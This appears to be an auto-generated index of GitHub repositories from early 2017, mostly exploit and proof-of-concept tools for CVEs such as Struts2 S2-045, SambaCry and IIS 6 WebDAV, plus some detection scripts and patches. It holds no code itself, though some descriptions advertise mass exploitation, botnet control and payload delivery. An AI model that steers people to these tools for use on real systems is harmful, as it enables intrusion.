**no description** : [homjxi0e/CVE-2017-7472](https://github.com/homjxi0e/CVE-2017-7472) create time: 2017-06-08T03:47:57Z

**Motorola Untethered Jailbreak: Exploiting CVE-2016-10277 for Secure Boot and Device Locking bypass** : [alephsecurity/initroot](https://github.com/alephsecurity/initroot) create time: 2017-06-06T12:00:27Z

**no description** : [AndreasKl/CVE-2017-5638](https://github.com/AndreasKl/CVE-2017-5638) create time: 2017-06-05T20:11:06Z

**Remote root exploit for the SAMBA CVE-2017-7494 vulnerability** : [joxeankoret/CVE-2017-7494](https://github.com/joxeankoret/CVE-2017-7494) create time: 2017-06-05T16:25:57Z

**no description** : [homjxi0e/CVE-2017-1000367](https://github.com/homjxi0e/CVE-2017-1000367) create time: 2017-06-04T12:31:59Z

**Exploiting CVE-2016-4657 to JailBreak the Nintendo Switch** : [iDaN5x/Switcheroo](https://github.com/iDaN5x/Switcheroo) create time: 2017-06-02T10:54:27Z

**no description** : [c0d3z3r0/sudo-CVE-2017-1000367](https://github.com/c0d3z3r0/sudo-CVE-2017-1000367) create time: 2017-05-30T18:12:38Z

**It is a simple script to exploit RCE for Samba (CVE-2017-7494 ).** : [brianwrf/SambaHunter](https://github.com/brianwrf/SambaHunter) create time: 2017-05-30T15:08:32Z

**Exploits for CVE-2017-6008, a kernel pool buffer overflow leading to privilege escalation.** : [cbayet/Exploit-CVE-2017-6008](https://github.com/cbayet/Exploit-CVE-2017-6008) create time: 2017-05-30T09:55:55Z

**An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.** : [jpacora/Struts2Shell](https://github.com/jpacora/Struts2Shell) create time: 2017-05-28T06:44:13Z

**An exploit for CVE-2017-5638 Remote Code Execution (RCE) Vulnerability in Apache Struts 2** : [SpiderMate/Stutsfi](https://github.com/SpiderMate/Stutsfi) create time: 2017-05-28T03:48:10Z

**CVE-2017-5638** : [Aasron/Struts2-045-Exp](https://github.com/Aasron/Struts2-045-Exp) create time: 2017-05-27T02:03:28Z

**CVE-2017-7494 - Detection Scripts** : [Waffles-2/SambaCry](https://github.com/Waffles-2/SambaCry) create time: 2017-05-26T07:28:26Z

**Quick assessment script for CVE2017-7494 in a distribution-agnostic way** : [gunsan92/CVE2017-7494_quicktest](https://github.com/gunsan92/CVE2017-7494_quicktest) create time: 2017-05-26T02:43:05Z

**SambaCry exploit and vulnerable container (CVE-2017-7494)** : [opsxcq/exploit-CVE-2017-7494](https://github.com/opsxcq/exploit-CVE-2017-7494) create time: 2017-05-26T00:58:25Z

**no description** : [k0keoyo/CVE-2015-2546-Exploit](https://github.com/k0keoyo/CVE-2015-2546-Exploit) create time: 2017-05-25T14:20:34Z

**no description** : [homjxi0e/CVE-2017-7494](https://github.com/homjxi0e/CVE-2017-7494) create time: 2017-05-25T14:13:10Z

**Proof-of-Concept exploit for CVE-2017-7494(Samba RCE from a writable share)** : [betab0t/cve-2017-7494](https://github.com/betab0t/cve-2017-7494) create time: 2017-05-25T13:20:56Z

**Admidio 3.2.8 Cross-Site Request Forgery Assigned CVE Number: CVE-2017-8382** : [faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc](https://github.com/faizzaidi/Admidio-3.2.8-CSRF-POC-by-Provensec-llc) create time: 2017-05-21T13:36:51Z

**Joomla 3.7 SQL injection (CVE-2017-8917)** : [brianwrf/Joomla3.7-SQLi-CVE-2017-8917](https://github.com/brianwrf/Joomla3.7-SQLi-CVE-2017-8917) create time: 2017-05-19T15:21:46Z

**Install patch for CVE-2017-0145 AKA WannaCry.** : [MelonSmasher/chef_tissues](https://github.com/MelonSmasher/chef_tissues) create time: 2017-05-19T13:55:06Z

**WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit** : [Bajunan/CVE-2016-10033](https://github.com/Bajunan/CVE-2016-10033) create time: 2017-05-19T12:52:21Z

**POC for exploit of CVE-2011-1237** : [BrunoPujos/CVE-2011-1237](https://github.com/BrunoPujos/CVE-2011-1237) create time: 2017-05-19T11:04:26Z

**no description** : [smythtech/DWF-CVE-2017-1000000](https://github.com/smythtech/DWF-CVE-2017-1000000) create time: 2017-05-17T10:14:54Z

**Create a docker container with vulnerable imagemagick and node app to demonstrate what CVE 2016-3714 is** : [mike-williams/imagetragick-poc](https://github.com/mike-williams/imagetragick-poc) create time: 2017-05-16T20:25:58Z

**Simple script using nmap to detect CVE-2017-0143 MS17-010 in your network** : [valarauco/wannafind](https://github.com/valarauco/wannafind) create time: 2017-05-16T19:34:38Z

**CVE-2017-7269 to webshell or shellcode loader** : [zcgonvh/cve-2017-7269-tool](https://github.com/zcgonvh/cve-2017-7269-tool) create time: 2017-05-16T18:47:45Z

**cve-2016-0728 exploit and summary** : [hal0taso/CVE-2016-0728](https://github.com/hal0taso/CVE-2016-0728) create time: 2017-05-16T06:37:19Z

**no description** : [baonq-me/cve2017-5689](https://github.com/baonq-me/cve2017-5689) create time: 2017-05-15T04:08:27Z

**Cisco Catalyst Remote Code Execution PoC** : [zakybstrd21215/PoC-CVE-2017-3881](https://github.com/zakybstrd21215/PoC-CVE-2017-3881) create time: 2017-05-11T12:11:51Z

**no description** : [homjxi0e/CVE-2017-0290-](https://github.com/homjxi0e/CVE-2017-0290-) create time: 2017-05-11T04:01:51Z

**Code and vulnerable WordPress container for exploiting CVE-2016-10033** : [chipironcin/CVE-2016-10033](https://github.com/chipironcin/CVE-2016-10033) create time: 2017-05-10T12:01:07Z

**RCE against WordPress 4.6; Python port of https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html** : [GeneralTesler/CVE-2016-10033](https://github.com/GeneralTesler/CVE-2016-10033) create time: 2017-05-10T03:18:46Z

**CVE-2017-8779 aka RPCBomb** : [drbothen/GO-RPCBOMB](https://github.com/drbothen/GO-RPCBOMB) create time: 2017-05-09T22:43:10Z

**simple python poc for CVE-2017-5689** : [Bijaye/intel_amt_bypass](https://github.com/Bijaye/intel_amt_bypass) create time: 2017-05-09T08:55:39Z

**Honeypot for Intel's AMT Firmware Vulnerability CVE-2017-5689** : [x1sec/amthoneypot](https://github.com/x1sec/amthoneypot) create time: 2017-05-06T15:35:42Z

**no description** : [cyberheartmi9/CVE-2017-8295](https://github.com/cyberheartmi9/CVE-2017-8295) create time: 2017-05-06T09:51:01Z

**a plugin that protects your wp site from the CVE-2017-8295 vulnerability** : [alash3al/wp-allowed-hosts](https://github.com/alash3al/wp-allowed-hosts) create time: 2017-05-05T16:34:17Z

**Apache Struts 2.0 RCE vulnerability - Allows an attacker to inject OS commands into a web application through the content-type header** : [payatu/CVE-2017-5638](https://github.com/payatu/CVE-2017-5638) create time: 2017-05-05T13:17:37Z

**no description** : [homjxi0e/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset](https://github.com/homjxi0e/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset) create time: 2017-05-04T19:05:12Z

**no description** : [CerberusSecurity/CVE-2017-5689](https://github.com/CerberusSecurity/CVE-2017-5689) create time: 2017-05-04T01:51:26Z

**RedDot CMS versions 7.5 Build 7.5.0.48 and below full database enumeration exploit that takes advantage of a remote SQL injection vulnerability in ioRD.asp.** : [SECFORCE/CVE-2008-1613](https://github.com/SECFORCE/CVE-2008-1613) create time: 2017-05-03T19:39:27Z

**Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection** : [SECFORCE/CVE-2008-5416](https://github.com/SECFORCE/CVE-2008-5416) create time: 2017-05-03T19:31:34Z

**no description** : [homjxi0e/CVE-2017-3881-Cisco](https://github.com/homjxi0e/CVE-2017-3881-Cisco) create time: 2017-05-02T23:21:53Z

**no description** : [homjxi0e/CVE-2017-4490-](https://github.com/homjxi0e/CVE-2017-4490-) create time: 2017-05-02T04:21:46Z

**From SQL injection to root shell with CVE-2016-6662 by MaYaSeVeN** : [MAYASEVEN/CVE-2016-6662](https://github.com/MAYASEVEN/CVE-2016-6662) create time: 2017-05-01T08:51:08Z

**Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell** : [zalalov/CVE-2014-6271](https://github.com/zalalov/CVE-2014-6271) create time: 2017-04-30T19:47:00Z

**A rebuilt version of the exploit for CVE-2016-1542 and CVE-2016-1543 from insinuator.net** : [patriknordlen/bladelogic_bmc-cve-2016-1542](https://github.com/patriknordlen/bladelogic_bmc-cve-2016-1542) create time: 2017-04-27T09:16:01Z

**CVE-2020-8012, CVE-2016-10709, CVE-2017-17099, CVE-2017-18047, CVE-2019-1003000, CVE-2018-1999002** : [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development) create time: 2017-04-26T02:03:43Z

**CVE-2017-5693 Denial of service vulnerability in Puma 6 modems** : [TransLunarInjection/Puma6Fail](https://github.com/TransLunarInjection/Puma6Fail) create time: 2017-04-25T21:25:43Z

**Cve-2017-0199** : [joke998/Cve-2017-0199-](https://github.com/joke998/Cve-2017-0199-) create time: 2017-04-25T03:48:53Z

**no description** : [joke998/Cve-2017-0199](https://github.com/joke998/Cve-2017-0199) create time: 2017-04-25T03:38:15Z

**An exploit implementation for RCE in RTF & DOCs (CVE-2017-0199)** : [kn0wm4d/htattack](https://github.com/kn0wm4d/htattack) create time: 2017-04-24T23:44:31Z

**CVE-2017-7269** : [xiaovpn/CVE-2017-7269](https://github.com/xiaovpn/CVE-2017-7269) create time: 2017-04-24T08:42:59Z

**Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.** : [n1shant-sinha/CVE-2017-0199](https://github.com/n1shant-sinha/CVE-2017-0199) create time: 2017-04-23T13:58:30Z

**Exploit toolkit for vulnerability RCE Microsoft RTF** : [zakybstrd21215/PoC-CVE-2017-0199](https://github.com/zakybstrd21215/PoC-CVE-2017-0199) create time: 2017-04-22T11:32:39Z

**Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / any other payload to victim without any complex configuration.** : [Exploit-install/CVE-2017-0199](https://github.com/Exploit-install/CVE-2017-0199) create time: 2017-04-22T04:01:38Z

**no description** : [homjxi0e/CVE-2017-3881-exploit-cisco-](https://github.com/homjxi0e/CVE-2017-3881-exploit-cisco-) create time: 2017-04-20T00:52:10Z

**phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion** : [SECFORCE/CVE-2011-4107](https://github.com/SECFORCE/CVE-2011-4107) create time: 2017-04-19T14:54:13Z

**CVE-2017-0199** : [haibara3839/CVE-2017-0199-master](https://github.com/haibara3839/CVE-2017-0199-master) create time: 2017-04-19T04:15:54Z

**CVE-2011-3368 exploit code** : [SECFORCE/CVE-2011-3368](https://github.com/SECFORCE/CVE-2011-3368) create time: 2017-04-18T20:34:53Z

**Proof of concept exploit for CVE-2017-3599** : [SECFORCE/CVE-2017-3599](https://github.com/SECFORCE/CVE-2017-3599) create time: 2017-04-18T17:08:39Z

**Quick and dirty fix to OLE2 executing code via .hta** : [NotAwful/CVE-2017-0199-Fix](https://github.com/NotAwful/CVE-2017-0199-Fix) create time: 2017-04-18T06:33:45Z

**Exploit developed by me for CVE-2017-5633.** : [cardangi/Exploit-CVE-2017-5633](https://github.com/cardangi/Exploit-CVE-2017-5633) create time: 2017-04-18T01:44:33Z

**Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.** : [bhdresh/CVE-2017-0199](https://github.com/bhdresh/CVE-2017-0199) create time: 2017-04-17T08:10:07Z

**no description** : [homjxi0e/CVE-2017-0108](https://github.com/homjxi0e/CVE-2017-0108) create time: 2017-04-15T02:10:16Z

**no description** : [homjxi0e/CVE-2016-7255](https://github.com/homjxi0e/CVE-2016-7255) create time: 2017-04-15T01:46:52Z

**PoC for CVE-2016-5345** : [NickStephens/cve-2016-5345](https://github.com/NickStephens/cve-2016-5345) create time: 2017-04-15T01:08:22Z

**Addressbar spoofing through blob URL (Firefox browser). An attack can use a blob URL and script to spoof an arbitrary addressbar URL prefaced by blob: as the protocol, leading to user confusion and further spoofing attacks.** : [649/CVE-2017-5415](https://github.com/649/CVE-2017-5415) create time: 2017-04-14T04:55:41Z

**no description** : [SyFi/cve-2017-0199](https://github.com/SyFi/cve-2017-0199) create time: 2017-04-13T16:40:27Z

**no description** : [homjxi0e/cve-2017-7269](https://github.com/homjxi0e/cve-2017-7269) create time: 2017-04-13T09:27:01Z

**no description** : [ryhanson/CVE-2017-0204](https://github.com/ryhanson/CVE-2017-0204) create time: 2017-04-13T02:42:24Z

**no description** : [ryhanson/CVE-2017-0106](https://github.com/ryhanson/CVE-2017-0106) create time: 2017-04-13T02:42:08Z

**no description** : [ryhanson/CVE-2017-0199](https://github.com/ryhanson/CVE-2017-0199) create time: 2017-04-13T02:41:36Z

**A writeup of CVE-2017-7648** : [notmot/CVE-2017-7648.](https://github.com/notmot/CVE-2017-7648.) create time: 2017-04-10T18:41:59Z

**Zurmo-Stable-3.1.1 Cross Site Scripting (XSS) Assigned CVE Number: CVE-2017-7188** : [faizzaidi/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC](https://github.com/faizzaidi/Zurmo-Stable-3.1.1-XSS-By-Provensec-LLC) create time: 2017-04-10T10:52:13Z

**CVE-2017-3881 Cisco Catalyst Remote Code Execution PoC** : [artkond/cisco-rce](https://github.com/artkond/cisco-rce) create time: 2017-04-10T03:44:04Z

**Exploit for CVE-2017-6971 remote command execution in nfsen 1.3.7.** : [patrickfreed/nfsen-exploit](https://github.com/patrickfreed/nfsen-exploit) create time: 2017-04-10T00:13:24Z

**Strutsy - Mass exploitation of Apache Struts (CVE-2017-5638) vulnerability** : [tahmed11/strutsy](https://github.com/tahmed11/strutsy) create time: 2017-04-09T08:57:08Z

**poc and vulnerability analysis of CVE-2017-0541** : [JiounDai/CVE-2017-0541](https://github.com/JiounDai/CVE-2017-0541) create time: 2017-04-08T14:28:22Z

**Ruby Exploit for IIS 6.0 Buffer Overflow (CVE-2017-7269)** : [slimpagey/IIS_6.0_WebDAV_Ruby](https://github.com/slimpagey/IIS_6.0_WebDAV_Ruby) create time: 2017-04-06T13:27:20Z

**iis6 exploit 2017 CVE-2017-7269** : [g0rx/iis6-exploit-2017-CVE-2017-7269](https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269) create time: 2017-04-05T23:21:12Z

**no description** : [jrrombaldo/CVE-2017-7269](https://github.com/jrrombaldo/CVE-2017-7269) create time: 2017-04-04T08:47:22Z

**fixed msf module for cve-2017-7269** : [zcgonvh/cve-2017-7269](https://github.com/zcgonvh/cve-2017-7269) create time: 2017-03-30T22:20:36Z

**no description** : [whiteHat001/cve-2017-7269picture](https://github.com/whiteHat001/cve-2017-7269picture) create time: 2017-03-30T12:03:05Z

**Poc for iis6.0** : [M1a0rz/CVE-2017-7269](https://github.com/M1a0rz/CVE-2017-7269) create time: 2017-03-30T04:35:13Z

**exec 8 bytes command** : [caicai1355/CVE-2017-7269-exploit](https://github.com/caicai1355/CVE-2017-7269-exploit) create time: 2017-03-29T12:52:54Z

**CVE-2017-7269 回显PoC ,用于远程漏洞检测..** : [lcatro/CVE-2017-7269-Echo-PoC](https://github.com/lcatro/CVE-2017-7269-Echo-PoC) create time: 2017-03-29T11:20:19Z

**An exploit for Microsoft IIS 6.0 CVE-2017-7269** : [eliuha/webdav_exploit](https://github.com/eliuha/webdav_exploit) create time: 2017-03-29T05:59:30Z

**A demo server for CVE-2016-3955 (UBOAT)** : [pqsec/uboatdemo](https://github.com/pqsec/uboatdemo) create time: 2017-03-29T05:05:41Z

**no description** : [HaToan/CVE-2016-2173](https://github.com/HaToan/CVE-2016-2173) create time: 2017-03-29T01:25:40Z

**Struts2 RCE CVE-2017-5638 CLI shell** : [opt9/Strutscli](https://github.com/opt9/Strutscli) create time: 2017-03-28T04:31:44Z

**no description** : [mcassano/cve-2017-5638](https://github.com/mcassano/cve-2017-5638) create time: 2017-03-26T01:58:52Z

**CVE-2017-5638** : [gsfish/S2-Reaper](https://github.com/gsfish/S2-Reaper) create time: 2017-03-23T08:44:10Z

**no description** : [k0keoyo/CVE-2017-0038-EXP-C-JS](https://github.com/k0keoyo/CVE-2017-0038-EXP-C-JS) create time: 2017-03-22T13:59:48Z

**rabl 0.8.6 + fix for CVE-2014-4671** : [cph/rabl-old](https://github.com/cph/rabl-old) create time: 2017-03-21T19:43:46Z

**S2-046|S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)** : [KarzsGHR/S2-046_S2-045_POC](https://github.com/KarzsGHR/S2-046_S2-045_POC) create time: 2017-03-21T17:36:40Z

**no description** : [ottimo/burp-alfresco-referer-proxy-cve-2014-9301](https://github.com/ottimo/burp-alfresco-referer-proxy-cve-2014-9301) create time: 2017-03-21T14:05:12Z

**st2-046-poc CVE-2017-5638** : [jas502n/st2-046-poc](https://github.com/jas502n/st2-046-poc) create time: 2017-03-21T05:47:49Z

**The DGS-1510 Websmart switch series firmware has been found to have security vulneratiblies. The vulnerabilities include unauthenticated command bypass and unauthenticated information disclosure.** : [varangamin/CVE-2017-6206](https://github.com/varangamin/CVE-2017-6206) create time: 2017-03-20T17:24:22Z

**TYPO3 v7.6.15 Unencrypted Login Request Assigned CVE Number: CVE-2017-6370** : [faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request](https://github.com/faizzaidi/TYPO3-v7.6.15-Unencrypted-Login-Request) create time: 2017-03-20T05:51:07Z

**no description** : [boompig/cve-2016-6662](https://github.com/boompig/cve-2016-6662) create time: 2017-03-19T23:36:41Z

**poc of CVE-2017-0478** : [JiounDai/CVE-2017-0478](https://github.com/JiounDai/CVE-2017-0478) create time: 2017-03-19T02:18:37Z

**no description** : [bhagdave/CVE-2017-5638](https://github.com/bhagdave/CVE-2017-5638) create time: 2017-03-18T09:39:59Z

**CVE-2016-5195 dirtycow by timwr automated multi file patch tool** : [droidvoider/dirtycow-replacer](https://github.com/droidvoider/dirtycow-replacer) create time: 2017-03-18T03:21:02Z

**Apache Struts (CVE-2017-5638) Shell** : [falcon-lnhg/StrutsShell](https://github.com/falcon-lnhg/StrutsShell) create time: 2017-03-17T18:05:55Z

**code for webkit exploit, Nintendo Switch** : [Traiver/CVE-2016-4657-Switch-Browser-Binary](https://github.com/Traiver/CVE-2016-4657-Switch-Browser-Binary) create time: 2017-03-17T01:39:57Z

**Struts2 RCE CVE-2017-5638 non-intrusive check shell script** : [opt9/Strutshock](https://github.com/opt9/Strutshock) create time: 2017-03-16T02:59:22Z

**MS16-032(CVE-2016-0099) for SERVICE ONLY** : [zcgonvh/MS16-032](https://github.com/zcgonvh/MS16-032) create time: 2017-03-15T17:16:55Z

**Exploiting Edge's read:// urlhandler** : [Dankirk/cve-2017-0065](https://github.com/Dankirk/cve-2017-0065) create time: 2017-03-15T13:01:29Z

**CVE-2014-0050 Vulnerable site sample** : [jrrdev/cve-2014-0050](https://github.com/jrrdev/cve-2014-0050) create time: 2017-03-15T04:59:23Z

**cve-2017-5638 Vulnerable site sample** : [jrrdev/cve-2017-5638](https://github.com/jrrdev/cve-2017-5638) create time: 2017-03-15T00:19:33Z

**poc for CVE-2015-1855** : [vpereira/CVE-2015-1855](https://github.com/vpereira/CVE-2015-1855) create time: 2017-03-14T16:01:46Z

**poc for CVE-2009-5147** : [vpereira/CVE-2009-5147](https://github.com/vpereira/CVE-2009-5147) create time: 2017-03-14T09:04:14Z

**CVE-2016-4657 for NintendoSwitch rwx** : [Mimoja/CVE-2016-4657-NintendoSwitch](https://github.com/Mimoja/CVE-2016-4657-NintendoSwitch) create time: 2017-03-13T13:08:17Z

**Example PHP Exploiter for CVE-2017-5638** : [oktavianto/CVE-2017-5638-Apache-Struts2](https://github.com/oktavianto/CVE-2017-5638-Apache-Struts2) create time: 2017-03-13T11:39:55Z

**A php based exploiter for CVE-2017-5638.** : [lolwaleet/ExpStruts](https://github.com/lolwaleet/ExpStruts) create time: 2017-03-12T13:03:52Z

**These are just some script which you can use to detect and exploit the Apache Struts Vulnerability (CVE-2017-5638)** : [ret2jazzy/Struts-Apache-ExploitPack](https://github.com/ret2jazzy/Struts-Apache-ExploitPack) create time: 2017-03-12T06:28:51Z

**An exploit for Apache Struts CVE-2017-5638** : [mazen160/struts-pwn](https://github.com/mazen160/struts-pwn) create time: 2017-03-12T02:02:25Z

**detection for Apache Struts recon and compromise** : [initconf/CVE-2017-5638_struts](https://github.com/initconf/CVE-2017-5638_struts) create time: 2017-03-11T14:30:02Z

**CVE: 2017-5638 in different formats** : [random-robbie/CVE-2017-5638](https://github.com/random-robbie/CVE-2017-5638) create time: 2017-03-11T11:22:44Z

**no description** : [jrrombaldo/CVE-2017-5638](https://github.com/jrrombaldo/CVE-2017-5638) create time: 2017-03-11T10:43:16Z

**test struts2 vulnerability CVE-2017-5638 in Mac OS X** : [sjitech/test_struts2_vulnerability_CVE-2017-5638](https://github.com/sjitech/test_struts2_vulnerability_CVE-2017-5638) create time: 2017-03-11T10:03:54Z

**Tweaking original PoC (https://github.com/rapid7/metasploit-framework/issues/8064) to work on self-signed certificates** : [aljazceru/CVE-2017-5638-Apache-Struts2](https://github.com/aljazceru/CVE-2017-5638-Apache-Struts2) create time: 2017-03-11T09:39:09Z

**This is Valve for Tomcat7 to block Struts 2 Remote Code Execution vulnerability (CVE-2017-5638)** : [Masahiro-Yamada/OgnlContentTypeRejectorValve](https://github.com/Masahiro-Yamada/OgnlContentTypeRejectorValve) create time: 2017-03-11T03:18:12Z

**Demo Application and Exploit** : [immunio/apache-struts2-CVE-2017-5638](https://github.com/immunio/apache-struts2-CVE-2017-5638) create time: 2017-03-10T21:33:25Z

**Exploit code for CVE-2016-9066** : [saelo/foxpwn](https://github.com/saelo/foxpwn) create time: 2017-03-10T20:08:13Z

**Example PoC Code for CVE-2017-5638 | Apache Struts Exploit** : [xsscx/cve-2017-5638](https://github.com/xsscx/cve-2017-5638) create time: 2017-03-10T16:56:14Z

**no description** : [paralelo14/CVE_2017_5638](https://github.com/paralelo14/CVE_2017_5638) create time: 2017-03-10T15:16:44Z

**Telegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638)** : [mthbernardes/strutszeiro](https://github.com/mthbernardes/strutszeiro) create time: 2017-03-10T04:23:41Z

**CVE-2014-4210+Redis未授权访问** : [NoneNotNull/SSRFX](https://github.com/NoneNotNull/SSRFX) create time: 2017-03-10T02:09:48Z

**Ansible role for workaround for CVE-2017-2636 (Red Hat) - https://access.redhat.com/security/cve/CVE-2017-2636** : [alexzorin/cve-2017-2636-el](https://github.com/alexzorin/cve-2017-2636-el) create time: 2017-03-09T23:20:42Z

**S2-045 漏洞 POC-TOOLS CVE-2017-5638** : [jas502n/S2-045-EXP-POC-TOOLS](https://github.com/jas502n/S2-045-EXP-POC-TOOLS) create time: 2017-03-09T19:40:47Z

**no description** : [bongbongco/cve-2017-5638](https://github.com/bongbongco/cve-2017-5638) create time: 2017-03-08T04:17:33Z

**Struts2 S2-045(CVE-2017-5638)Exp with GUI** : [Flyteas/Struts2-045-Exp](https://github.com/Flyteas/Struts2-045-Exp) create time: 2017-03-07T10:30:20Z

**Struts2 S2-045(CVE-2017-5638)Vulnerability environment - http://www.mottoin.com/97954.html** : [PolarisLab/S2-045](https://github.com/PolarisLab/S2-045) create time: 2017-03-07T05:30:30Z

**전자부품연구원 콘텐츠응용연구센터 첫번째 개발 과제 openCV와 python을 활용한 얼굴 인식(Recognition) 프로그램** : [jungining/2017_OpenCVEX_faceRecog_Python](https://github.com/jungining/2017_OpenCVEX_faceRecog_Python) create time: 2017-03-07T02:31:32Z

**no description** : [theglife214/CVE-2015-5195](https://github.com/theglife214/CVE-2015-5195) create time: 2017-03-04T01:41:58Z

**An exploit for CVE-2016-7255 on Windows 7/8/8.1/10(pre-anniversary) 64 bit** : [FSecureLABS/CVE-2016-7255](https://github.com/FSecureLABS/CVE-2016-7255) create time: 2017-03-02T23:32:08Z

**A brief report on CVE-2016-4117 (A vulnerability in Adobe Flash)** : [amit-raut/CVE-2016-4117-Report](https://github.com/amit-raut/CVE-2016-4117-Report) create time: 2017-02-23T15:00:10Z

**不完美的利用代码,只能用于学习:)** : [i-o-s/CVE-2016-4669](https://github.com/i-o-s/CVE-2016-4669) create time: 2017-02-21T08:15:18Z

**Proof of concept exploit for CVE-2012-1723** : [EthanNJC/CVE-2012-1723](https://github.com/EthanNJC/CVE-2012-1723) create time: 2017-02-20T19:53:31Z

**no description** : [cvele-test/vladimir-cvetic-techtask-20170209](https://github.com/cvele-test/vladimir-cvetic-techtask-20170209) create time: 2017-02-18T14:18:06Z

**CVE-2017-2370** : [Rootkitsmm-zz/extra_recipe-iOS-10.2](https://github.com/Rootkitsmm-zz/extra_recipe-iOS-10.2) create time: 2017-02-13T21:32:40Z

**CVE-2013-1775 Exploit written in Perl** : [bekhzod0725/perl-CVE-2013-1775](https://github.com/bekhzod0725/perl-CVE-2013-1775) create time: 2017-02-11T08:26:24Z

**Minion plugin for checking Ticketbleed (CVE-2016-9244)** : [glestel/minion-ticket-bleed-plugin](https://github.com/glestel/minion-ticket-bleed-plugin) create time: 2017-02-10T13:17:01Z

**This is a tool for exploiting Ticketbleed (CVE-2016-9244) vulnerability.** : [EgeBalci/Ticketbleed](https://github.com/EgeBalci/Ticketbleed) create time: 2017-02-10T10:21:15Z

**CVE-2016-9079 exploit code as it appeared on https://lists.torproject.org/pipermail/tor-talk/2016-November/042639.html** : [LakshmiDesai/CVE-2016-9079](https://github.com/LakshmiDesai/CVE-2016-9079) create time: 2017-02-08T07:41:37Z

**Exploits CVE-2016-5640 / CLVA-2016-05-002 against Crestron AM-100** : [vpnguy-zz/CrestCrack](https://github.com/vpnguy-zz/CrestCrack) create time: 2017-02-07T19:42:06Z

**no description** : [paralelo14/CVE-2015-1579](https://github.com/paralelo14/CVE-2015-1579) create time: 2017-02-03T12:00:39Z

**Go Exploit for CVE-2011-4862** : [hdbreaker/GO-CVE-2011-4862](https://github.com/hdbreaker/GO-CVE-2011-4862) create time: 2017-02-02T18:12:56Z

**Ian Beer's exploit for CVE-2017-2370 (kernel memory r/w on iOS 10.2)** : [JackBro/extra_recipe](https://github.com/JackBro/extra_recipe) create time: 2017-02-02T11:16:38Z

**CVE-2015-1635** : [u0pattern/Remove-IIS-RIIS](https://github.com/u0pattern/Remove-IIS-RIIS) create time: 2017-01-28T16:26:54Z

**vagrant box exploiting cve-2016-0728** : [sibilleg/exploit_cve-2016-0728](https://github.com/sibilleg/exploit_cve-2016-0728) create time: 2017-01-27T15:45:35Z

**Ian Beer's exploit for CVE-2017-2370 (kernel memory r/w on iOS 10.2) https://bugs.chromium.org/p/project-zero/issues/detail?id=1004** : [maximehip/extra_recipe](https://github.com/maximehip/extra_recipe) create time: 2017-01-26T19:47:43Z

**Proof of concept CVE-2016-2098** : [Alejandro-MartinG/rails-PoC-CVE-2016-2098](https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098) create time: 2017-01-25T23:42:31Z

**no description** : [Pilou-Pilou/docker_CVE-2014-6271.](https://github.com/Pilou-Pilou/docker_CVE-2014-6271.) create time: 2017-01-25T21:51:52Z

**OpenSSL CVE-2017-3730 proof-of-concept** : [guidovranken/CVE-2017-3730](https://github.com/guidovranken/CVE-2017-3730) create time: 2017-01-22T00:40:34Z

**CVE-2016-5195 (Dirty COW) PoC for Android 6.0.1 Marshmallow** : [hyln9/VIKIROOT](https://github.com/hyln9/VIKIROOT) create time: 2017-01-20T05:28:04Z

**no description** : [nu11secur1ty/Protect-CVE-2016-5195-DirtyCow](https://github.com/nu11secur1ty/Protect-CVE-2016-5195-DirtyCow) create time: 2017-01-19T13:36:58Z

**cve-2009-3103** : [mazding/ms09050](https://github.com/mazding/ms09050) create time: 2017-01-17T02:24:40Z

**Android APK Based On Public Information Using DirtyCOW CVE-2016-5195 Exploit** : [esc0rtd3w/org.cowpoop.moooooo](https://github.com/esc0rtd3w/org.cowpoop.moooooo) create time: 2017-01-16T10:41:26Z

**no description** : [sribaba/android-CVE-2016-5195](https://github.com/sribaba/android-CVE-2016-5195) create time: 2017-01-15T03:56:27Z

**no description** : [heh3/CVE-2016-7255](https://github.com/heh3/CVE-2016-7255) create time: 2017-01-13T15:49:58Z

**Android App that removes amazon ads on the lockscreen on motorolla phones using exploit CVE 2016 5195** : [martinmullins/amazon_remove_ads_apk](https://github.com/martinmullins/amazon_remove_ads_apk) create time: 2017-01-12T01:06:12Z

**Proof-of-concept exploit for CVE-2016-1827 on OS X Yosemite.** : [bazad/flow_divert-heap-overflow](https://github.com/bazad/flow_divert-heap-overflow) create time: 2017-01-10T03:41:56Z

**Elasticsearch 1.4.0 < 1.4.2 Remote Code Execution exploit and vulnerable container** : [t0kx/exploit-CVE-2015-1427](https://github.com/t0kx/exploit-CVE-2015-1427) create time: 2017-01-09T20:08:56Z

**ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container** : [t0kx/exploit-CVE-2015-3306](https://github.com/t0kx/exploit-CVE-2015-3306) create time: 2017-01-08T14:19:51Z

**Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header** : [paralelo14/CVE-2015-8562](https://github.com/paralelo14/CVE-2015-8562) create time: 2017-01-08T12:59:16Z

**This app checks if you're vulnerable to CVE-2016-8467 and/or if your bootmode property has been tampered with.** : [roeeh/bootmodechecker](https://github.com/roeeh/bootmodechecker) create time: 2017-01-08T12:14:57Z

